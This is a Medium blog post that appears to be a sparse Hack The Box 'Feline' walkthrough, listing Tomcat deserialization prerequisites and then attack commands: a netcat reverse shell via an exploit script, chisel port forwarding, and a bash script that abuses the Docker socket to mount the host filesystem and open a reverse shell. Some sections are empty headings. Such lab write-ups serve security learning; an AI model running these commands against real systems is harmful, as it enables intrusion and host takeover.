Hack The Box — Feline

  1. Recon / Information gathering
  2. Scanning
  3. Gaining Access
  4. Maintaining Access
  5. Reporting / Analysis

1. Information Gathering

  1. The PersistentManager is enabled and it’s using a FileStore
  2. The attacker is able to upload a file with arbitrary content, has control over the filename and knows the location where it is uploaded
  3. There are gadgets in the classpath that can be used for a Java deserialization attack

2. Scanning

  1. We have upload function?
  2. IsPersistentManager enabled?
  3. We know the upload file path on the server ?
  4. We know the upload directory?

3. Gaining Access

4. Maintaining Access

python3 exploit.py --master 192.168.115.130 --exec "nc xx.xx.xx.xx xxxx -e /bin/sh"
Local machine: 
./chiesel server -p 80 --reverse
Vulnerable machine:
./chiesel client 10.10.xx.xx:80 R:4506:127.0.0.1:4506
Local machine
Vulnerable machine
#!/bin/bash                                                                                                                            
pay="bash -c 'bash -i >& /dev/tcp/10.10.xx.xx/8888 0>&1'"
payload="[\"/bin/sh\",\"-c\",\"chroot /mnt sh -c \\\"$pay\\\"\"]" response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{\"Image\":\"sandbox\",\"cmd\":$payload, \"Binds\": [\"/:/mnt:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create)
revShellContainerID=$(echo "$response" | cut -d'"' -f4)
curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/$revShellContainerID/start sleep 1 curl --output - -s --unix-socket /var/run/docker.sock "http://localhost/containers/$revShellContainerID/logs?stderr=1&stdout=1"

Stay in touch

Offensive Security Enthusiast — twitter @eslam3kll

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

MASQ Aludel Rewards Update

Celestial BSC galaxy Beta version to official data transferring rules:

Top 10 Threats of Web Security

Ransomware — the modern-day hostage

Security tip: avoid brute force attack via root ssh

What is OAuth 2.0

Unilock: Create your campaign token from within

7 Ways to Use Binfer File Sharing Software

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Eslam Akl

Eslam Akl

Offensive Security Enthusiast — twitter @eslam3kll

More from Medium

TryHackMe: SimpleCTF

Vulnhub: Crossroads 1 Walkthrough

HackTheBox — Access

[EN] TryHackMe 25 Days of Cyber Security: Day 5 Walkthrough